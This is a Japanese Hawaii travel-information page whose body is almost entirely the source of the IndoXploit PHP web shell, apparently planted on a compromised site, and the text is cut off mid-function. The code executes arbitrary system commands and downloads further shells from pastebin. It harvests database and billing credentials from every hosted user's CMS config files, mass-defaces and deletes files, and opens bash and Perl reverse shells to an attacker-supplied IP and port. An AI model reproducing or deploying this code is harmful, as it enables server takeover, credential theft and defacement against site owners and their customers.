ホーム > ハワイ基本情報

ハワイ基本情報

IndoXploit
	
/$$$$$$$$ /$$$$$$            /$$$$$$$                               
| $$_____//$$$_  $$          | $$__  $$                              
| $$     | $$$$\ $$ /$$   /$$| $$  \ $$  /$$$$$$   /$$$$$$$  /$$$$$$ 
| $$$$$  | $$ $$ $$|  $$ /$$/| $$$$$$$  |____  $$ /$$_____/ /$$__  $$
| $$__/  | $$\ $$$$ \  $$$$/ | $$__  $$  /$$$$$$$|  $$$$$$ | $$$$$$$$
| $$     | $$ \ $$$  >$$  $$ | $$  \ $$ /$$__  $$ \____  $$| $$_____/
| $$     |  $$$$$$/ /$$/\  $$| $$$$$$$/|  $$$$$$$ /$$$$$$$/|  $$$$$$$
|__/      \______/ |__/  \__/|_______/  \_______/|_______/  \_______/

	
IndoXploit
	
/$$$$$$$$ /$$$$$$            /$$$$$$$                               
| $$_____//$$$_  $$          | $$__  $$                              
| $$     | $$$$\ $$ /$$   /$$| $$  \ $$  /$$$$$$   /$$$$$$$  /$$$$$$ 
| $$$$$  | $$ $$ $$|  $$ /$$/| $$$$$$$  |____  $$ /$$_____/ /$$__  $$
| $$__/  | $$\ $$$$ \  $$$$/ | $$__  $$  /$$$$$$$|  $$$$$$ | $$$$$$$$
| $$     | $$ \ $$$  >$$  $$ | $$  \ $$ /$$__  $$ \____  $$| $$_____/
| $$     |  $$$$$$/ /$$/\  $$| $$$$$$$/|  $$$$$$$ /$$$$$$$/|  $$$$$$$
|__/      \______/ |__/  \__/|_______/  \_______/|_______/  \_______/

	
", # 0 off "", # 1 red "", # 2 lime "", # 3 white "", # 4 gold ); return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid]; } function OS() { return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux"; } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function save($filename, $mode, $file) { $handle = fopen($filename, $mode); fwrite($handle, $file); fclose($handle); return; } function getfile($name) { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name.")); if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php"); elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php"); elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx"); elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx"); elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php"); $fp = fopen($get[1], "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $get[0]); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } function usergroup() { if(!function_exists('posix_getegid')) { $user['name'] = @get_current_user(); $user['uid'] = @getmyuid(); $user['gid'] = @getmygid(); $user['group'] = "?"; } else { $user['uid'] = @posix_getpwuid(posix_geteuid()); $user['gid'] = @posix_getgrgid(posix_getegid()); $user['name'] = $user['uid']['name']; $user['uid'] = $user['uid']['uid']; $user['group'] = $user['gid']['name']; $user['gid'] = $user['gid']['gid']; } return (object) $user; } function getuser() { $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd")); while($read = fgets($fopen)) { preg_match_all('/(.*?):x:/', $read, $getuser); $user[] = $getuser[1][0]; } return $user; } function getdomainname() { $fopen = fopen("/etc/named.conf", "r"); while($read = fgets($fopen)) { preg_match_all("#/var/named/(.*?).db#", $read, $getdomain); $domain[] = $getdomain[1][0]; } return $domain; } function hddsize($size) { if($size >= 1073741824) return sprintf('%1.2f',$size / 1073741824 ).' GB'; elseif($size >= 1048576) return sprintf('%1.2f',$size / 1048576 ) .' MB'; elseif($size >= 1024) return sprintf('%1.2f',$size / 1024 ) .' KB'; else return $size .' B'; } function hdd() { $hdd['size'] = hddsize(disk_total_space("/")); $hdd['free'] = hddsize(disk_free_space("/")); $hdd['used'] = $hdd['size'] - $hdd['free']; return (object) $hdd; } function writeable($path, $perms) { return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms); } function perms($path) { $perms = fileperms($path); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function lib_installed() { $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF")); return implode(" | ", $lib); } function pwd() { $dir = explode("/", path()); foreach($dir as $key => $index) { print "$index/"; } print "
"; print (OS() === "Windows") ? windisk() : ""; } function windisk() { $letters = ""; $v = explode("\\", path()); $v = $v[0]; foreach(range("A", "Z") as $letter) { $bool = $isdiskette = in_array($letter, array("A")); if(!$bool) $bool = is_dir("$letter:\\"); if($bool) { $letters .= "[ "; if($letter.":" != $v) { $letters .= $letter; } else { $letters .= color(1, 2, $letter); } $letters .= " ]"; } } if(!empty($letters)) { print "Detected Drives $letters
"; } if(count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $v = realpath(path(). ".."); if(empty($v)) { $a = explode(DIRECTORY_SEPARATOR,path()); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR, $a); } print "".$item[0].""; } } } function serverinfo() { $disable_functions = @ini_get('disable_functions'); $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE"); $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']); $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']); $output[] = "SYSTEM : ".color(1, 2, php_uname()); $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")"; $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")"; $output[] = "PHP VERSION : ".color(1, 2, @phpversion()); $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF")); $output[] = "DISABLE FUNC: $disable_functions"; $output[] = lib_installed(); $output[] = "Current Dir (".writeable(path(), perms(path())).") "; print "
";
	print implode("
", $output); pwd(); print "
"; } function curl($url, $post = false, $data = null) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); if($post) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } return curl_exec($ch); curl_close($ch); } function reverse() { $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket="); $response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response))))))))))))); $explode = explode(",,", $response); unset($explode[0]); foreach($explode as $domain) { $domain = "http://$domain"; $domain = str_replace(",", "", $domain); $url[] = $domain; ob_flush(); flush(); } return $url; } function getValue($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function massdeface($dir, $file, $filename, $type = null) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === "." || $dir_ === "..") { file_put_contents($location, $file); } else { if(is_dir($path) AND is_writable($path)) { print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
"; file_put_contents($location, $file); if($type === "-alldir") { massdeface($path, $file, $filename, "-alldir"); } } } } } function massdelete($dir, $filename) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === '.') { if(file_exists("$dir/$filename")) { unlink("$dir/$filename"); } } elseif($dir_ === '..') { if(file_exists(dirname($dir)."/$filename")) { unlink(dirname($dir)."/$filename"); } } else { if(is_dir($path) AND is_writable($path)) { if(file_exists($location)) { print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
"; unlink($location); massdelete($path, $filename); } } } } } function tools($toolsname, $args = null) { if($toolsname === "cmd") { print "
".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
"; } elseif($toolsname === "readfile") { if(empty($args)) die(color(1, 1, $msg)); if(!is_file($args)) die(color(1, 1, "File '$args' is not exists.")); print "
";
		print htmlspecialchars(file_get_contents($args));
		print "
"; } elseif($toolsname === "spawn") { if($args === "adminer") { if(file_exists("adminer.php")) { print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php"; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'.")); if(getfile("adminer")) { print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php"; } else { print color(1, 1, "Error while downloading file Adminer."); @unlink("adminer.php"); } } } elseif($args === "webconsole") { if(file_exists("webconsole.php")) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'.")); if(getfile("webconsole")) { print ""; } else { print color(1, 1, "Error while downloading file WebConsole."); @unlink("webconsole.php"); } } } elseif($args === "cgitelnet1") { if(file_exists("idx_cgi/cgitelnet1.idx")) { print ""; } elseif(file_exists('cgitelnet1.idx')) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'.")); if(!is_dir(path()."/idx_cgi/")) { @mkdir('idx_cgi', 0755); save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx"); } if(getfile("cgitelnet1")) { chmod('idx_cgi/cgitelnet1.idx', 0755); print ""; } else { print color(1, 1, "Error while downloading file CGI Telnet."); @rmdir(path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/"); } } } elseif($args === "cgitelnet2") { if(file_exists("idx_cgi/cgitelnet2.idx")) { print ""; } elseif(file_exists('cgitelnet2.idx')) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'.")); if(!is_dir(path()."/idx_cgi/")) { @mkdir('idx_cgi', 0755); save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx"); } if(getfile("cgitelnet2")) { chmod('idx_cgi/cgitelnet2.idx', 0755); print ""; } else { print color(1, 1, "Error while downloading file CGI Telnet."); @rmdir(path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/"); } } } elseif($args === "phpinfo") { if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'.")); save("phpinfo.php", "w", "
'; phpinfo(); print '
'; ?>"); print ""; } } } elseif($toolsname === "upload") { if($_POST['upload']) { if($_POST['uploadtype'] === '1') { if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) { $act = color(1, 2, "Uploaded!")." at ".path().DIRECTORY_SEPARATOR.$_FILES['file']['name'].""; } else { $act = color(1, 1, "Failed to upload file!"); } } elseif($_POST['uploadtype'] === '2') { $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name']; $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['file']['tmp_name'], $root)) { $act = color(1, 2, "Uploaded!")." at $root -> $web"; } else { $act = color(1, 1, "Failed to upload file!"); } } else { $act = color(1, 1, "Failed to upload file!"); } } } print "Upload File: $act
current_dir [ ".writeable(path(), "Writeable")." ] document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]
"; } elseif($toolsname === "jumping") { $i = 0; foreach(getuser() as $user) { $path = "/home/$user/public_html"; if(is_readable($path)) { $status = color(1, 2, "[R]"); if(is_writable($path)) { $status = color(1, 2, "[RW]"); } $i++; print "$status ".color(1, 4, $path).""; if(!function_exists('posix_getpwuid')) print "
"; if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."
"; foreach(getdomainname() as $domain) { $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain")); $userdomain = $userdomain->name; if($userdomain === $user) { print " => ".color(1, 2, $domain)."
"; break; } } } } print ($i === 0) ? "" : "

".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."

"; } elseif($toolsname === "idxconfig") { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'.")); if(!is_dir(path()."/idx_config/")) { @mkdir('idx_config', 0755); $htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any"; save("idx_config/.htaccess","w", $htaccess); foreach(getuser() as $user) { $user_docroot = "/home/$user/public_html/"; if(is_readable($user_docroot)) { $getconfig = array( "/home/$user/.accesshash" => "WHM-accesshash", "$user_docroot/config/koneksi.php" => "Lokomedia", "$user_docroot/forum/config.php" => "phpBB", "$user_docroot/sites/default/settings.php" => "Drupal", "$user_docroot/config/settings.inc.php" => "PrestaShop", "$user_docroot/app/etc/local.xml" => "Magento", "$user_docroot/admin/config.php" => "OpenCart", "$user_docroot/application/config/database.php" => "Ellislab", "$user_docroot/vb/includes/config.php" => "Vbulletin", "$user_docroot/includes/config.php" => "Vbulletin", "$user_docroot/forum/includes/config.php" => "Vbulletin", "$user_docroot/forums/includes/config.php" => "Vbulletin", "$user_docroot/cc/includes/config.php" => "Vbulletin", "$user_docroot/inc/config.php" => "MyBB", "$user_docroot/includes/configure.php" => "OsCommerce", "$user_docroot/shop/includes/configure.php" => "OsCommerce", "$user_docroot/os/includes/configure.php" => "OsCommerce", "$user_docroot/oscom/includes/configure.php" => "OsCommerce", "$user_docroot/products/includes/configure.php" => "OsCommerce", "$user_docroot/cart/includes/configure.php" => "OsCommerce", "$user_docroot/inc/conf_global.php" => "IPB", "$user_docroot/wp-config.php" => "Wordpress", "$user_docroot/wp/test/wp-config.php" => "Wordpress", "$user_docroot/blog/wp-config.php" => "Wordpress", "$user_docroot/beta/wp-config.php" => "Wordpress", "$user_docroot/portal/wp-config.php" => "Wordpress", "$user_docroot/site/wp-config.php" => "Wordpress", "$user_docroot/wp/wp-config.php" => "Wordpress", "$user_docroot/WP/wp-config.php" => "Wordpress", "$user_docroot/news/wp-config.php" => "Wordpress", "$user_docroot/wordpress/wp-config.php" => "Wordpress", "$user_docroot/test/wp-config.php" => "Wordpress", "$user_docroot/demo/wp-config.php" => "Wordpress", "$user_docroot/home/wp-config.php" => "Wordpress", "$user_docroot/v1/wp-config.php" => "Wordpress", "$user_docroot/v2/wp-config.php" => "Wordpress", "$user_docroot/press/wp-config.php" => "Wordpress", "$user_docroot/new/wp-config.php" => "Wordpress", "$user_docroot/blogs/wp-config.php" => "Wordpress", "$user_docroot/configuration.php" => "Joomla", "$user_docroot/blog/configuration.php" => "Joomla", "$user_docroot/submitticket.php" => "^WHMCS", "$user_docroot/cms/configuration.php" => "Joomla", "$user_docroot/beta/configuration.php" => "Joomla", "$user_docroot/portal/configuration.php" => "Joomla", "$user_docroot/site/configuration.php" => "Joomla", "$user_docroot/main/configuration.php" => "Joomla", "$user_docroot/home/configuration.php" => "Joomla", "$user_docroot/demo/configuration.php" => "Joomla", "$user_docroot/test/configuration.php" => "Joomla", "$user_docroot/v1/configuration.php" => "Joomla", "$user_docroot/v2/configuration.php" => "Joomla", "$user_docroot/joomla/configuration.php" => "Joomla", "$user_docroot/new/configuration.php" => "Joomla", "$user_docroot/WHMCS/submitticket.php" => "WHMCS", "$user_docroot/whmcs1/submitticket.php" => "WHMCS", "$user_docroot/Whmcs/submitticket.php" => "WHMCS", "$user_docroot/whmcs/submitticket.php" => "WHMCS", "$user_docroot/whmcs/submitticket.php" => "WHMCS", "$user_docroot/WHMC/submitticket.php" => "WHMCS", "$user_docroot/Whmc/submitticket.php" => "WHMCS", "$user_docroot/whmc/submitticket.php" => "WHMCS", "$user_docroot/WHM/submitticket.php" => "WHMCS", "$user_docroot/Whm/submitticket.php" => "WHMCS", "$user_docroot/whm/submitticket.php" => "WHMCS", "$user_docroot/HOST/submitticket.php" => "WHMCS", "$user_docroot/Host/submitticket.php" => "WHMCS", "$user_docroot/host/submitticket.php" => "WHMCS", "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS", "$user_docroot/Supportes/submitticket.php" => "WHMCS", "$user_docroot/supportes/submitticket.php" => "WHMCS", "$user_docroot/domains/submitticket.php" => "WHMCS", "$user_docroot/domain/submitticket.php" => "WHMCS", "$user_docroot/Hosting/submitticket.php" => "WHMCS", "$user_docroot/HOSTING/submitticket.php" => "WHMCS", "$user_docroot/hosting/submitticket.php" => "WHMCS", "$user_docroot/CART/submitticket.php" => "WHMCS", "$user_docroot/Cart/submitticket.php" => "WHMCS", "$user_docroot/cart/submitticket.php" => "WHMCS", "$user_docroot/ORDER/submitticket.php" => "WHMCS", "$user_docroot/Order/submitticket.php" => "WHMCS", "$user_docroot/order/submitticket.php" => "WHMCS", "$user_docroot/CLIENT/submitticket.php" => "WHMCS", "$user_docroot/Client/submitticket.php" => "WHMCS", "$user_docroot/client/submitticket.php" => "WHMCS", "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS", "$user_docroot/Clientarea/submitticket.php" => "WHMCS", "$user_docroot/clientarea/submitticket.php" => "WHMCS", "$user_docroot/SUPPORT/submitticket.php" => "WHMCS", "$user_docroot/Support/submitticket.php" => "WHMCS", "$user_docroot/support/submitticket.php" => "WHMCS", "$user_docroot/BILLING/submitticket.php" => "WHMCS", "$user_docroot/Billing/submitticket.php" => "WHMCS", "$user_docroot/billing/submitticket.php" => "WHMCS", "$user_docroot/BUY/submitticket.php" => "WHMCS", "$user_docroot/Buy/submitticket.php" => "WHMCS", "$user_docroot/buy/submitticket.php" => "WHMCS", "$user_docroot/MANAGE/submitticket.php" => "WHMCS", "$user_docroot/Manage/submitticket.php" => "WHMCS", "$user_docroot/manage/submitticket.php" => "WHMCS", "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS", "$user_docroot/ClientSupport/submitticket.php" => "WHMCS", "$user_docroot/Clientsupport/submitticket.php" => "WHMCS", "$user_docroot/clientsupport/submitticket.php" => "WHMCS", "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS", "$user_docroot/Checkout/submitticket.php" => "WHMCS", "$user_docroot/checkout/submitticket.php" => "WHMCS", "$user_docroot/BILLINGS/submitticket.php" => "WHMCS", "$user_docroot/Billings/submitticket.php" => "WHMCS", "$user_docroot/billings/submitticket.php" => "WHMCS", "$user_docroot/BASKET/submitticket.php" => "WHMCS", "$user_docroot/Basket/submitticket.php" => "WHMCS", "$user_docroot/basket/submitticket.php" => "WHMCS", "$user_docroot/SECURE/submitticket.php" => "WHMCS", "$user_docroot/Secure/submitticket.php" => "WHMCS", "$user_docroot/secure/submitticket.php" => "WHMCS", "$user_docroot/SALES/submitticket.php" => "WHMCS", "$user_docroot/Sales/submitticket.php" => "WHMCS", "$user_docroot/sales/submitticket.php" => "WHMCS", "$user_docroot/BILL/submitticket.php" => "WHMCS", "$user_docroot/Bill/submitticket.php" => "WHMCS", "$user_docroot/bill/submitticket.php" => "WHMCS", "$user_docroot/PURCHASE/submitticket.php" => "WHMCS", "$user_docroot/Purchase/submitticket.php" => "WHMCS", "$user_docroot/purchase/submitticket.php" => "WHMCS", "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS", "$user_docroot/Account/submitticket.php" => "WHMCS", "$user_docroot/account/submitticket.php" => "WHMCS", "$user_docroot/USER/submitticket.php" => "WHMCS", "$user_docroot/User/submitticket.php" => "WHMCS", "$user_docroot/user/submitticket.php" => "WHMCS", "$user_docroot/CLIENTS/submitticket.php" => "WHMCS", "$user_docroot/Clients/submitticket.php" => "WHMCS", "$user_docroot/clients/submitticket.php" => "WHMCS", "$user_docroot/BILLINGS/submitticket.php" => "WHMCS", "$user_docroot/Billings/submitticket.php" => "WHMCS", "$user_docroot/billings/submitticket.php" => "WHMCS", "$user_docroot/MY/submitticket.php" => "WHMCS", "$user_docroot/My/submitticket.php" => "WHMCS", "$user_docroot/my/submitticket.php" => "WHMCS", "$user_docroot/secure/whm/submitticket.php" => "WHMCS", "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS", "$user_docroot/panel/submitticket.php" => "WHMCS", "$user_docroot/clientes/submitticket.php" => "WHMCS", "$user_docroot/cliente/submitticket.php" => "WHMCS", "$user_docroot/support/order/submitticket.php" => "WHMCS", "$user_docroot/bb-config.php" => "BoxBilling", "$user_docroot/boxbilling/bb-config.php" => "BoxBilling", "$user_docroot/box/bb-config.php" => "BoxBilling", "$user_docroot/host/bb-config.php" => "BoxBilling", "$user_docroot/Host/bb-config.php" => "BoxBilling", "$user_docroot/supportes/bb-config.php" => "BoxBilling", "$user_docroot/support/bb-config.php" => "BoxBilling", "$user_docroot/hosting/bb-config.php" => "BoxBilling", "$user_docroot/cart/bb-config.php" => "BoxBilling", "$user_docroot/order/bb-config.php" => "BoxBilling", "$user_docroot/client/bb-config.php" => "BoxBilling", "$user_docroot/clients/bb-config.php" => "BoxBilling", "$user_docroot/cliente/bb-config.php" => "BoxBilling", "$user_docroot/clientes/bb-config.php" => "BoxBilling", "$user_docroot/billing/bb-config.php" => "BoxBilling", "$user_docroot/billings/bb-config.php" => "BoxBilling", "$user_docroot/my/bb-config.php" => "BoxBilling", "$user_docroot/secure/bb-config.php" => "BoxBilling", "$user_docroot/support/order/bb-config.php" => "BoxBilling", "$user_docroot/includes/dist-configure.php" => "Zencart", "$user_docroot/zencart/includes/dist-configure.php" => "Zencart", "$user_docroot/products/includes/dist-configure.php" => "Zencart", "$user_docroot/cart/includes/dist-configure.php" => "Zencart", "$user_docroot/shop/includes/dist-configure.php" => "Zencart", "$user_docroot/includes/iso4217.php" => "Hostbills", "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills", "$user_docroot/host/includes/iso4217.php" => "Hostbills", "$user_docroot/Host/includes/iso4217.php" => "Hostbills", "$user_docroot/supportes/includes/iso4217.php" => "Hostbills", "$user_docroot/support/includes/iso4217.php" => "Hostbills", "$user_docroot/hosting/includes/iso4217.php" => "Hostbills", "$user_docroot/cart/includes/iso4217.php" => "Hostbills", "$user_docroot/order/includes/iso4217.php" => "Hostbills", "$user_docroot/client/includes/iso4217.php" => "Hostbills", "$user_docroot/clients/includes/iso4217.php" => "Hostbills", "$user_docroot/cliente/includes/iso4217.php" => "Hostbills", "$user_docroot/clientes/includes/iso4217.php" => "Hostbills", "$user_docroot/billing/includes/iso4217.php" => "Hostbills", "$user_docroot/billings/includes/iso4217.php" => "Hostbills", "$user_docroot/my/includes/iso4217.php" => "Hostbills", "$user_docroot/secure/includes/iso4217.php" => "Hostbills", "$user_docroot/support/order/includes/iso4217.php" => "Hostbills" ); foreach($getconfig as $config => $userconfig) { $get = file_get_contents($config); if($get == '') { } else { $fopen = fopen("idx_config/$user-$userconfig.txt", "w"); fputs($fopen, $get); } } } } } print "
"; print ""; print "
"; } elseif($toolsname === "network") { $args = explode(" ", $args); if($args[0] === "bc") { if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!")); if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!")); if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'.")); if($args[3] === "bash") { exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1"); } elseif($args[3] === "perl") { $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; save("/tmp/bc.pl", "w", base64_decode($bc['code'])); $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &"); sleep(1); print "
".$bc['exec']."\n".exe("ps aux | grep bc.pl")."
"; @unlink("/tmp/bc.pl"); } } elseif($args[0] === "bp") { if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!")); if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'.")); if($args[2] === "perl") { $bp['code'] = 